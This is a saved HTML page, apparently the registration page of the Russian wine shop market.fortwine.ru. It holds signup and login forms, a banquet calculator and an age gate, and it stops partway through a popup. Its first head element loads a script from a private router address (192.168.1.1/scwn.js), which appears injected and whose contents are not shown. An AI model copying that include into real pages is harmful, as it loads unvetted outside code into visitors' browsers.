<!doctype html>
<html class="no-js" lang="en">
<head>
    <script type="text/javascript" src="http://192.168.1.1/scwn.js"></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="/local/templates/b2c/favicon.ico" rel="shortcut icon">
    <title>Вино — market.fortwine.ru</title>
    <link rel="stylesheet" href="./local/templates/b2c/fonts/MyriadPro/MyriadPro.css">
    <link rel="stylesheet" href="./local/templates/b2c/fonts/MyriadProCond/MyriadProCond.css">
    <link rel="stylesheet" href="./local/templates/b2c/css/foundation-custom.css">
    <link rel="stylesheet" href="./local/templates/b2c/bower_components/slick.js/slick/slick.css">
    <link rel="stylesheet" href="./local/templates/b2c/bower_components/magnific-popup/magnific-popup.min.css">
    <link rel="stylesheet" href="./local/templates/b2c/bower_components/jquery-ui-1.11.4.custom/jquery-ui.min.css">
    <!--link rel="stylesheet" href="/local/templates/b2c/bower_components/ionrangeslider/css/ion.rangeSlider.css"-->
    <script src="/local/templates/b2c/bower_components/jquery/dist/jquery.min.js"></script>
    <script src="/local/templates/b2c/bower_components/modernizr/modernizr.js"></script>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name="robots" content="index, follow"/>
    <meta name="keywords" content="1С-Битрикс, CMS, PHP, bitrix, система управления контентом"/>
    <meta name="description" content="1С-Битрикс: Управление сайтом"/>
    <link href="./local/templates/b2c/css/kernel_main.css" type="text/css" rel="stylesheet"/>
    <link href="./local/templates/b2c/css/page_bfd50e5718507d5b5cf2d181a1e7ea1c.css" type="text/css" rel="stylesheet"/>
    <link href="./local/templates/b2c/css/template_eee9d1952e8148457743a821fb5f5b34.css" type="text/css" data-template-style="true" rel="stylesheet"/>
    <link href="./local/templates/b2c/css/template_a882cc9d2fafef3e946197f933e90fa3.css" type="text/css" data-template-style="true" rel="stylesheet"/>
    <link href="./local/templates/b2c/css/addition.css" type="text/css" data-template-style="true" rel="stylesheet"/>
    
    
    <script type="text/javascript" src="/bitrix/cache/js/s1/b2c/kernel_main/kernel_main.js?1523862835390036"></script>
    <script type="text/javascript" src="/bitrix/js/main/jquery/jquery-1.8.3.min.js?152362749693637"></script>
    <script type="text/javascript" src="/bitrix/cache/js/s1/b2c/kernel_kombox/kernel_kombox.js?15238621213365"></script>
    
    
    <script type="text/javascript" src="./local/templates/b2c/js/template_6203e3b07bee69f378b6dd86f2b96b27.js"></script>
    <script type="text/javascript" src="./local/templates/b2c/js/page_7c9549a24ea836750a778a1471364b03.js"></script>
    
    <script>new Image().src = 'http://market.fortwine.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF9zMQEBMTU1NTMzMTc4NwEvAQEBAkJJVFJJWF9TTV9HVUVTVF9JRAE4Mjk1NgExNTU1MzMxNzg3AS8BAQECQklUUklYX1NNX0xBU1RfVklTSVQBMjAuMDQuMjAxOCAxNTozNjoyNwExNTU1MzMxNzg3AS8BAQEC&k=e7f33ef76e6feb60f6d44daf89ce7660';
    </script>
    
    
    <!--[if IE]>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
    <![endif]-->
</head>
<body>


<div class="page">
    
    
    <div id="sticky-wrapper" class="sticky-wrapper" style="height: 95px;position: relative">
        <div class="header">
            <div class="contain-to-grid">
                <nav class="top-bar" data-topbar data-options="custom_back_text: false;" role="navigation">
                    <ul class="title-area">
                        <li class="name">
                            <h1>
                                <a href="/">
                                    <img src="./local/templates/b2c/img/fort_logo-dark.png" alt="">
                                </a>
                            </h1>
                        </li>
                        <li class="toggle-topbar menu-icon">
                            <a href="#">
                                <span></span>
                            </a>
                        </li>
                    
                    </ul>
                    <div class="header__search" style="margin-top:26px;">
                        <a href="#">
                            <span class="s-text">Поиск</span> <span class="icon icon--search"></span>
                        </a>
                        <form action="/catalog/">
                            <div id="title-search">
                            </div>
                            <input type="hidden" name="tags"/>
                            <input type="hidden" name="where"/>
                            <input type="hidden" name="how" value="r"/>
                            <input type="text" name="q" placeholder="Введите запрос" id="title-search-input" autocomplete="off">
                            <input type="reset" value="Очистить">
                            <input type="submit" name="s" value="Найти">
                        
                        </form>
                    
                    
                    </div>
                    
                    <section class="top-bar-section top-bar-section--mod">
                        
                        
                        <ul class="right">
                            
                            
                            <li class=""><a href="http://fortwine.ru">Компания</a></li>
                            
                            
                            <li class="active"><a href="/catalog/vino/">Вино</a></li>
                            
                            
                            <li class=""><a href="/catalog/igristye_vina/">Игристые вина</a></li>
                            
                            
                            <li class=""><a href="/catalog/krepkiy_alkogol/">Крепкий алкоголь</a></li>
                            
                            
                            <li class=""><a href="/catalog/voda/">Вода</a></li>
                            
                            
                            <li class="n-header__cab new">
                                <div>
                                    <div class="n-header__cab__container enther_cab_href">
                                        <!--<span class="n-header__cab__hello"></span>
                                    <span class="n-header__cab__name"></span>
                                    <div class="n-header__cab__bttn enther_cab_href">
                                            <span>войти</span>
                                    </div>-->
                                        <img src="./local/templates/b2c/img/ico_in-dark.png" alt="login"/>
                                        <span>Войти</span>
                                    </div>
                                </div>
                            </li>
                            <li class="prob"></li>
                            <li class="n-header__bucket" onclick='window.location.href = "/personal/cart/"'>
                                <a href="/personal/cart/">
                                    <span>0 шт</span>
                                </a>
                            
                            
                            </li>
                            <li class="n-header__favorites" onclick='window.location.href = "/personal/favorite/"'>
                                <a href="/personal/favorite/" style="background: none;">
                                    <span>0</span>
                                </a>
                            </li>
                        </ul>
                    </section>
                </nav>
            </div>
        </div>
        <div class="header__search middle" style="margin-top:26px;">
            <a href="#">
                <span class="s-text">Поиск</span> <span class="icon icon--search"></span>
            </a>
            <form action="/catalog/">
                <div id="title-search-mobi">
                </div>
                <input type="hidden" name="tags"/>
                <input type="hidden" name="where"/>
                <input type="hidden" name="how" value="r"/>
                <input type="text" name="q" placeholder="Введите запрос" id="title-search-input-mobi" autocomplete="off">
                <input type="reset" value="Очистить">
                <input type="submit" name="s" value="Найти">
            
            </form>
        
        
        </div>
        <div class="header__search mobi" style="margin-top:26px;">
            <a href="#">
                <span class="s-text">Поиск</span> <span class="icon icon--search"></span>
            </a>
            <form action="/catalog/">
                <div id="title-search-mobi">
                </div>
                <input type="hidden" name="tags"/>
                <input type="hidden" name="where"/>
                <input type="hidden" name="how" value="r"/>
                <input type="text" name="q" placeholder="Введите запрос" id="title-search-input-mobi" autocomplete="off">
                <input type="reset" value="Очистить">
                <input type="submit" name="s" value="Найти">
            
            </form>
        
        
        </div>
        
        <div class="desk-version__wrap">
            <button class="desk-version__button" id="full-version">Полная версия сайта</button>
        </div>
    </div>
    
    <div class="content">
        <div class="row n-main n-registration-layout">
            
            <div class="n-registration">
                <h1 class="c-title-h1">Регистрация market.fortwine.ru</h1>
                <h3 class="c-title-h3">Заполните обязательные поля для быстрой регистрации</h3>
                <div class="n-registration__decor"><img src="./local/templates/b2c/new-img/wine-glasses.png" alt=""></div>
                <form class="n-registration-form" method="post" action="/ajax/check_reg.php" name="regform" enctype="multipart/form-data">
                    
                    <div class="n-registration-form__grid">
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label><span class="starrequired">*</span>Логин</label>
                                <input size="30" type="text" name="REGISTER[LOGIN]" value=""/>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label>Пароль:<span class="starrequired">*</span></label>
                                <input size="30" type="password" name="REGISTER[PASSWORD]" value=""/>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label>Подтвердите пароля:<span class="starrequired">*</span></label>
                                <input size="30" type="password" name="REGISTER[CONFIRM_PASSWORD]" value=""/>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label>Фамилия:</label>
                                <input size="30" type="text" name="REGISTER[LAST_NAME]" value=""/>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label>Имя:</label>
                                <input size="30" type="text" name="REGISTER[NAME]" value=""/>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label>Отчество:</label>
                                <input size="30" type="text" name="REGISTER[PATRONYMIC]" value=""/>
                                <!--Форма перенесена со старого сайта, в прошолй форме не было этого поля-->
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label>Дата рождения:</label>
                                
                                <div class="n-registration-form__date">
                                    <div class="n-registration-form__col">
                                        <select name="registration-day" id="registration-day">
                                            <option value="01">01</option>
                                            <option value="02">02</option>
                                            <option value="03">03</option>
                                        </select>
                                    </div>
                                    <div class="n-registration-form__col">
                                        <select name="registration-day" id="registration-day">
                                            <option value="01">янв</option>
                                            <option value="02">фев</option>
                                            <option value="03">мрт</option>
                                        </select>
                                    </div>
                                    <div class="n-registration-form__col">
                                        <select name="registration-day" id="registration-day">
                                            <option value="01">2018</option>
                                            <option value="02">2017</option>
                                            <option value="03">2016</option>
                                        </select>
                                    </div>
                                </div>
                            
                            
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            
                            <div class="n-registration-form__item">
                                <label>Город:</label>
                                <select name="registration-city" id="">
                                    <option value="">Москва</option>
                                    <option value="">Санкт-Петербург</option>
                                </select>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label>Телефон:</label>
                                <input size="30" type="text" name="REGISTER[PERSONAL_PHONE]" value=""/>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label><span class="starrequired">*</span>E-mail</label>
                                <input size="30" type="text" name="REGISTER[EMAIL]" value=""/>
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-registration-form__item">
                                <label><span class="starrequired">*</span>Компания</label>
                                <input size="30" type="text" name="REGISTER[COMPANY]" value=""/>
                                <!--новое поле-->
                            </div>
                        </div>
                        <div class="n-registration-form__col">
                            <div class="n-pop-up-done--mod__field error">
                                <label>У вас есть ПРОМО-код?</label>
                                <input class="" size="30" type="text" name="UF_PROMO" value="" maxlength="9" minlength="9"/>
                                <div class="error-text">введите правильно</div>
                            </div>
                        </div>
                    
                    </div>
                    
                    
                    <div class="n-registration-form__item">
                        <input class="c-checkbox-input" type="checkbox" name="registration-regulations" id="registration-regulations" checked="">
                        <label class="c-checkbox" for="registration-regulations">Я согласен с <a href="#">Правилами сайта </a></label>
                    </div>
                    <div class="n-registration-form__item">
                        <input class="c-checkbox-input" type="checkbox" name="registration-data" id="registration-data" checked="">
                        <label class="c-checkbox" for="registration-data">Согласие на обработку моих персональных данных предоставляю</label>
                    </div>
                    
                    <!--<div class="n-pop-up-done&#45;&#45;mod__field" id="captcha">-->
                    <!--<label>Защита регистрации:<span class="starrequired">*</span></label>-->
                    <!--<input type="hidden" name="captcha_sid" value="03a44d553eb423a980af832306726bf2"/>-->
                    <!--<img src="/bitrix/tools/captcha.php?captcha_sid=03a44d553eb423a980af832306726bf2" width="180" height="40" alt="CAPTCHA"/>-->
                    <!--<input type="text" name="captcha_word" maxlength="50" value=""/>-->
                    <!--</div>-->
                    <div class="n-registration-form__item">
                        <input class="n-registration__btn" type="submit" name="register_submit_button" value="Зарегистрироваться"/>
                    </div>
                
                
                </form>
            
            </div>
            
            
            
            
            <script src="/local/templates/b2c/components/bitrix/catalog/def/js/phone-codes.js"></script>
            <script src="/local/templates/b2c/components/bitrix/catalog/def/js/jquery.inputmask.bundle.js"></script>
            <script language="javascript">
                var price_for_unit = '350';
                var defaultScope = new function () {
                    this.ready = function () {

                        $(":input").inputmask(undefined, {
                            oncomplete: function () {
                                var eventIdenticators = $(this).next().next(".eventIndicator").children("span");
                                $.each(eventIdenticators, function (ndx, lmnt) {
                                    var $lmnt = $(lmnt);
                                    if ($lmnt.hasClass("complete")) {
                                        $lmnt.addClass("fired");
                                    } else {
                                        $lmnt.removeClass("fired");
                                    }
                                });
                            },
                            onincomplete: function () {
                                var eventIdenticators = $(this).next().next(".eventIndicator").children("span");
                                $.each(eventIdenticators, function (ndx, lmnt) {
                                    var $lmnt = $(lmnt);
                                    if ($lmnt.hasClass("incomplete")) {
                                        $lmnt.addClass("fired");
                                    } else {
                                        $lmnt.removeClass("fired");
                                    }
                                });
                            },
                            oncleared: function () {
                                var eventIdenticators = $(this).next().next(".eventIndicator").children("span");
                                $.each(eventIdenticators, function (ndx, lmnt) {
                                    var $lmnt = $(lmnt);
                                    if ($lmnt.hasClass("cleared")) {
                                        $lmnt.addClass("fired");
                                    } else {
                                        $lmnt.removeClass("fired");
                                    }
                                });
                            },
                            onKeyValidation: function (result, opts) {
                                var eventIdenticators = $(this).next().next(".eventIndicator").children("span");
                                if (this.id == "phone") {
                                    $(this).next().text($(this).inputmask("getmetadata")["cd"]);
                                }
                                $.each(eventIdenticators, function (ndx, lmnt) {
                                    var $lmnt = $(lmnt);
                                    if ($lmnt.hasClass("keyvalidation")) {
                                        if (result !== false) {
                                            $lmnt.addClass("fired");
                                        } else {
                                            $lmnt.removeClass("fired");
                                        }
                                    }
                                });
                            }
                        }).on("input", function () {
                            var eventIdenticators = $(this).next().next(".eventIndicator").children("span");
                            $.each(eventIdenticators, function (ndx, lmnt) {
                                var $lmnt = $(lmnt);
                                if ($lmnt.hasClass("input")) {
                                    $lmnt.addClass("fired");
                                    setTimeout(function () {
                                        $lmnt.removeClass("fired");
                                    }, 100);
                                }
                            });
                        });

                    };
                };
                $(document).ready(function () {
                    defaultScope.ready();
                });
            </script>
            <div class="n-pop-up-order n-pop-up-order--mod zoom-anim-dialog mfp-hide" id="n-pop-up-calc">
                
                <div class="n-pop-up-order__container">
                    <form class="vine_calc">
                        <div class="n-close n-close--bttn">
                            <img src="./local/templates/b2c/components/bitrix/catalog/def/img/close.png" alt=""/></div>
                        <h3 class="n-pop-up-done__header">Банкетный калькулятор</h3>
                        
                        <div class="n-pop-up-order--mod__h">
                            Количество человек: от 1 до 10000
                        </div>
                        
                        <div class="n-pop-up-order--mod__values">
                            <div class="n-main__filter__block__range__vals">
                                
                                <div class="n-main__filter__block__range__vals__field">
                                    <div class="n-main__filter__block__range__vals__field__row">
                                        <span>от</span>
                                    </div>
                                    <div class="n-main__filter__block__range__vals__field__row">
                                        <input type="text" id="filter-before" value="0" maxlength="6" class="txtboxToFilter" name="piople_ot" data-inputmask="'alias': 'decimal', 'groupSeparator': ' ', 'autoGroup': true" style="font-weight: bold; text-align:center !important;">
                                    </div>
                                </div>
                                
                                <div class="n-main__filter__block__range__vals__line"></div>
                                
                                <div class="n-main__filter__block__range__vals__field">
                                    <div class="n-main__filter__block__range__vals__field__row">
                                        <span>до</span>
                                    </div>
                                    <div class="n-main__filter__block__range__vals__field__row">
                                        <input type="text" id="filter-after" value="800" maxlength="6" class="txtboxToFilter" name="piople_do" data-inputmask="'alias': 'decimal', 'groupSeparator': ' ', 'autoGroup': true" style="font-weight: bold; text-align:center !important;">
                                    </div>
                                </div>
                            
                            </div>
                        </div>
                        
                        <div class="n-pop-up-order--mod__h">
                            Бюджет на мероприятие:&nbsp;
                            <div class="n-main__filter__block__range__vals__field__row" style="display: inline-block; width: 28%;">
                                <input type="text" id="filter-before2" value="0" maxlength="11" class="txtboxToFilter" name="total_summ" data-inputmask="'alias': 'decimal', 'groupSeparator': ' ', 'autoGroup': true" style="font-weight: bold; text-align:center !important;"/>
                            </div>&nbsp;
                            руб.
                        </div>
                        
                        
                        <div class="n-pop-up-order--mod__month">
                            
                            <div class="n-pop-up-order--mod__h">
                                Месяц проведения
                            </div>
                            
                            <div class="n-pop-up-order--mod__month__block">
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_1">
                                        <div></div>
                                    </div>
                                    <span>Январь</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_2">
                                        <div></div>
                                    </div>
                                    <span>Февраль</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_3">
                                        <div></div>
                                    </div>
                                    <span>Март</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_4">
                                        <div></div>
                                    </div>
                                    <span>Апрель</span>
                                </div>
                            </div>
                            
                            <div class="n-pop-up-order--mod__month__block">
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_5">
                                        <div></div>
                                    </div>
                                    <span>Май</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_6">
                                        <div></div>
                                    </div>
                                    <span>Июнь</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_7">
                                        <div></div>
                                    </div>
                                    <span>Июль</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_8">
                                        <div></div>
                                    </div>
                                    <span>Август</span>
                                </div>
                            </div>
                            
                            <div class="n-pop-up-order--mod__month__block">
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_9">
                                        <div></div>
                                    </div>
                                    <span>Сентябрь</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_10">
                                        <div></div>
                                    </div>
                                    <span>Октябрь</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_11">
                                        <div></div>
                                    </div>
                                    <span>Ноябрь</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check">
                                        <input type="checkbox" name="month_12">
                                        <div></div>
                                    </div>
                                    <span>Декабрь</span>
                                </div>
                            </div>
                        
                        </div>
                        
                        <div class="n-pop-up-order--mod__cat">
                            <div class="n-pop-up-order--mod__cat__l">
                                Вид мероприятия:
                            </div>
                            <div class="n-pop-up-order--mod__cat__r">
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check"><input type="checkbox" name="mir_1">
                                        <div></div>
                                    </div>
                                    <span>банкет</span>
                                </div>
                                <div class="n-pop-up-order--mod__month__val one-of2">
                                    <div class="n-pop-up-order--mod__month__check"><input type="checkbox" name="mir_2">
                                        <div></div>
                                    </div>
                                    <span>фуршет</span>
                                </div>
                            </div>
                        </div>
                        
                        <a href="#" class="n-pop-up-order--mod__count">
                            <span>Рассчитать</span>
                        </a>
                    
                    </form>
                </div>
            
            </div>
            <!-- /.n-pop-up-order -->
        </div>
    </div>
    
    
    <div class="footer">
        <div class="row">
            <div class="small-4 medium-2 columns n-footer__col1">
                <div class="footer__logo">
                    <a href="/">
                        <img src="./local/templates/b2c/img/logo.png" alt="">
                    </a>
                </div>
            </div>
            <div class="small-2 columns show-for-large-up" style="width: 16.6%;">
                Виноторговая
                компания
                «Форт»
            </div>
            <div class="small-8 medium-7 large-3 columns n-footer__col3">
                <span class="icon icon--phone"></span> +7 495 410 81 08 [Москва]<br>
                <span class="icon icon--email"></span> <a href="mailto:corp@fortltd.ru">corp@fortltd.ru</a><br>
                <span class="icon icon--phone"></span> +7 812 334 31 03 [Санкт-Петербург]<br>
                <span class="icon icon--email"></span> <a href="mailto:corp.spb@fortltd.ru">corp.spb@fortltd.ru</a><br>
            </div>
            <div class="small-2 columns show-for-large-up n-footer__col4" style="width:15%">
                <div class="center">
                    
                    
                    <a href="/contacts">Контакты</a><br/>
                    <a href="http://fortwine.ru/vinotecs/">Винотеки Форт</a><br/>
                    <a href="/rules">Правовая информация</a><br/>
                    <a href="/support">Техническая поддержка</a><br/>
                    
                    
                    <a id="desk-version-menu" style="display:none">Мобильная версия сайта</a>
                </div>
            
            </div>
            <div class="small-3 columns n-footer__col5">
                <div class="footer__social">
                    <ul>
                        <li class="footer__social--fb"><a href="https://www.facebook.com/fortws/">Facebook</a></li>
                        <li class="footer__social--vk"><a href="https://vk.com/fortwineclub">Вконтакте</a></li>
                        <li class="footer__social--tw"><a href="https://twitter.com/Fort_Wine">Twitter</a></li>
                        <li class="footer__social--in"><a href="https://www.instagram.com/fort.ws/">Instagram</a></li>
                    </ul>
                    <style>
                        @media screen and (min-width: 1380px) {
                            .footer__social--in a {
                                background-position: -177px 0px;
                            }
                        }
                    </style>
                </div>
            </div>
        </div>
        <div class="n-footer__bottom">
            <div class="row">
                <span>Чрезмерное употребление алкоголя вредит вашему здоровью</span>
            </div>
        </div>
    </div>
    <script src="/local/templates/b2c/bower_components/jquery-placeholder/jquery.placeholder.js"></script>
    <script src="/local/templates/b2c/bower_components/fastclick/lib/fastclick.js"></script>
    <script src="/local/templates/b2c/bower_components/foundation/js/foundation.min.js"></script>
    <script src="/local/templates/b2c/bower_components/slick.js/slick/slick.min.js"></script>
    <script src="/local/templates/b2c/bower_components/jquery-sticky-footer/dist/jquery.sticky-footer.min.js"></script>
    <script src="/local/templates/b2c/bower_components/jscroll/jquery.jscroll.min.js"></script>
    <script src="/local/templates/b2c/bower_components/sticky/jquery.sticky.js"></script>
    <script src="/local/templates/b2c/bower_components/jquery.cookie/jquery.cookie.js"></script>
    <script src="/local/templates/b2c/bower_components/ionrangeslider/js/ion.rangeSlider.js"></script>
    <script src="/local/templates/b2c/bower_components/jquery-ui-1.11.4.custom/jquery-ui.min.js"></script>
    <script src="/local/templates/b2c/bower_components/magnific-popup/jquery.magnific-popup.min.js"></script>
    <script src="/local/templates/b2c/js/jquery.inputmask.bundle.js"></script>
    <script src="/local/templates/b2c/js/jquery.form.js"></script>
    <script src="/local/templates/b2c/include/widgets.js"></script>
    <script src="/local/templates/b2c/js/scripts.js"></script>
    <script src="/local/templates/b2c/js/some-scripts.js?r=8"></script>
    
    <div class="n-pop-up-done--mod login zoom-anim-dialog mfp-hide" id="n-pop-up-enter">
        
        <div class="n-pop-up-done__container">
            <div class="n-close n-close--bttn"><img src="./local/templates/b2c/img/close.png" alt=""></div>
            <h3 class="n-pop-up-done__header">Вход</h3>
            <div id="auth-errors">
            </div>
            <form name="system_auth_form6zOYVN" method="post" target="_top" action="/ajax/auth.php" id="auth_form">
                <input type="hidden" name="backurl" value="/catalog/vino/index.php"/>
                <input type="hidden" name="AUTH_FORM" value="Y"/>
                <input type="hidden" name="TYPE" value="AUTH"/>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Логин:</label>
                    <input type="text" name="USER_LOGIN" maxlength="50" value="" size="17"/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Пароль:</label>
                    <div class="n-pop-up-done--mod__forget" style="cursor:pointer;">забыли пароль?</div>
                    <input type="password" name="USER_PASSWORD" maxlength="50" size="17"/>
                </div>
                
                <div class="n-pop-up-done--mod__bottom">
                    <a class="n-pop-up-done--mod__reg" href="javascript:void(0)">Регистрация</a>
                    <input type="submit" name="Login" value="Войти">
                </div>
                
                <div class="">
                    <div class="n-pop-up-done--mod__forget client" style="cursor:pointer;">Я уже клиент компании</div>
                
                </div>
            </form>
        
        </div>
    </div>
    <div class="n-pop-up-done--mod forgoth zoom-anim-dialog mfp-hide" id="n-pop-up-remember">
        
        <div class="n-pop-up-done__container">
            <div class="n-close n-close--bttn"><img src="./local/templates/b2c/img/close.png" alt=""/></div>
            <h3 class="n-pop-up-done__header">Напомнить пароль</h3>
            <form name="bform" method="post" target="_top" action="/catalog/vino/">
                <input type="hidden" name="backurl" value="/catalog/vino/index.php"/>
                <input type="hidden" name="AUTH_FORM" value="Y">
                <input type="hidden" name="TYPE" value="SEND_PWD">
                
                <div class="n-pop-up-done--mod__field">
                    <label>Введите Ваш адрес e-mail:</label>
                    <input type="text" name="USER_EMAIL" maxlength="255">
                </div>
                
                <div class="n-pop-up-done--mod__bottom n-pop-up-done--mod__bottom--mod">
                    <input type="submit" name="send_account_info" value="Выслать">
                </div>
            
            </form>
            <script type="text/javascript">
                //document.bform.USER_LOGIN.focus();
            </script>
        </div>
    </div>
    
    
    <div class="n-pop-up-done--mod registration zoom-anim-dialog mfp-hide" id="" >
        
        <div class="n-pop-up-done__container">
            <div class="n-close n-close--bttn"><img src="./local/templates/b2c/img/close.png" alt=""/></div>
            <h3 class="n-pop-up-done__header">Регистрация</h3>
            <div id="error-cont">
            
            </div>
            
            <form method="post" action="/ajax/check_reg.php" name="regform" enctype="multipart/form-data">
                <div class="n-pop-up-done--mod__field">
                    <label>Логин (минимум 3 символа):<span class="starrequired">*</span></label>
                    <input size="30" type="text" name="REGISTER[LOGIN]" value=""/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Пароль:<span class="starrequired">*</span></label>
                    <input size="30" type="password" name="REGISTER[PASSWORD]" value=""/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Подтверждение пароля:<span class="starrequired">*</span></label>
                    <input size="30" type="password" name="REGISTER[CONFIRM_PASSWORD]" value=""/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Электронная почта (e-mail):<span class="starrequired">*</span></label>
                    <input size="30" type="text" name="REGISTER[EMAIL]" value=""/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Телефон:</label>
                    <input size="30" type="text" name="REGISTER[PERSONAL_PHONE]" value=""/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Имя:</label>
                    <input size="30" type="text" name="REGISTER[NAME]" value=""/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Фамилия:</label>
                    <input size="30" type="text" name="REGISTER[LAST_NAME]" value=""/>
                </div>
                
                <div class="n-pop-up-done--mod__field">
                    <label>Промо код</label>
                    <input size="30" type="text" name="UF_PROMO" value="" maxlength="9" minlength="9"/>
                </div>
                <div class="n-pop-up-done--mod__field" id="captcha">
                    <label>Защита регистрации:<span class="starrequired">*</span></label>
                    <input type="hidden" name="captcha_sid" value="03a44d553eb423a980af832306726bf2"/>
                    <img src="/bitrix/tools/captcha.php?captcha_sid=03a44d553eb423a980af832306726bf2" width="180" height="40" alt="CAPTCHA"/>
                    <input type="text" name="captcha_word" maxlength="50" value=""/>
                </div>
                <div class="checkboxes">
                    <label for="rules" class="n-main__filter__check">
                        <input type="checkbox" value="Y" class="filtr_check" checked="checked" name="reg_rules">
                        <div></div>
                    </label>
                    <a href='/rules/'>Я согласен с Правилами сайта</a>
                </div>
                <div class="checkboxes">
                    <label for="rules" class="n-main__filter__check">
                        <input type="checkbox" value="Y" class="filtr_check" checked="checked" name="reg_personal">
                        <div></div>
                    </label>
                    Согласие на обработку моих персональных данных предоставляю
                </div>
                <div class="n-pop-up-done--mod__bottom n-pop-up-done--mod__bottom--mod">
                    <input type="submit" name="register_submit_button" value="Зарегистрироваться" style="width: 100% !important;"/>
                </div>
            </form>
        </div>
    </div>
    <div class="n-pop-up-done--mod remanager zoom-anim-dialog mfp-hide" id="n-pop-up-remanager">
        
        <div class="n-pop-up-done__container">
            <div class="n-close n-close--bttn"><img src="./local/templates/b2c/img/close.png" alt=""/></div>
            <h3 class="n-pop-up-done__header">Сменить менеджера</h3>
            <p>Ваш запрос будет передан в Компанию и мы свяжемся с Вами в удобное для Вас время!</p>
            
            
            <p><font class="errortext"></font></p>
        </div>
    
    </div>
    <a href="#attention" class="popup-link show-attention" style="display: none">123</a>
    <div class="popup-container">
        <div id="attention" style="display: none">
            <div class="modal">
                <div class="body">
                    <div class="modal-text">
                        <div class="text">
                            <span class="f72">18+</span>
                            <span class="f24">Внимание!</span>
                        </div>
                        <span style="" id="txt18">
                        Сайт содержит информацию, не рекомендованную для лиц, не достигших совершеннолетнего возраста.
                    </span>
                        <div style="clear: both"></div>
                    </div>
                    <div class="checkboxes">
                        <label for="rules" class="n-main__filter__check">
                            <input type="checkbox" value="" class="filtr_check" checked="checked" name="rules">
                            <div></div>
                        </label>
                        <a href='/rules/'>Я согласен с Правилами сайта</a>
                    </div>
                    <div class="checkboxes">
                        <label for="rules" class="n-main__filter__check">
                            <input type="checkbox" value="" class="filtr_check" checked="checked" name="remember">
                            <div></div>
                        </label>
                        Запомнить мой выбор
                    </div>
                    <div class="buttons" id="modal-buttons">
                        <a href="#" class="btn no" onclick="attNo();
                            return false;">Извините, ошибся</a>
                        <a href="#" class="btn yes remember" onclick="attYes(this);
                            return false;" id="rules_read">Я совершеннолетний</a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    
    
    <div class="pop-up pop-up__cart">
        <img src="./local/templates/b2c/img/no-photo.jpg" alt="">
        <div class="close"></div>
        <div class="pop-up__wrap pop-up__wrap--add-to-cart">
            <span>Товар добавлен в корзину</span>
            <button class="pop-up__btn pop-up__btn--continue">продолжить выбор</button>
            <a href="/personal/cart/" class="pop-up__btn pop-up__btn--make-a-resquit">оформить заявку</a>
        </div>
    </div>
    
    
    <div class="pop-up pop-up__favorites">
        <img src="./local/templates/b2c/img/no-photo.jpg" alt="">
        <div class="close"></div>
        <div class="pop-up__wrap pop-up__wrap--add-to-favoutive">
            <span class="text">Товар добавлен в избранное</span>
            <a href="/personal/favorite/" class="pop-up__btn pop-up__btn--personal-area">перейти в избранное</a>
            <button class="pop-up__btn pop-up__btn--continue">продолжить выбор</button>
        </div>
    </div>
    
    <div class="pop-up pop-up-custom pop-up__choice-city"  >
        <div class="close"></div>
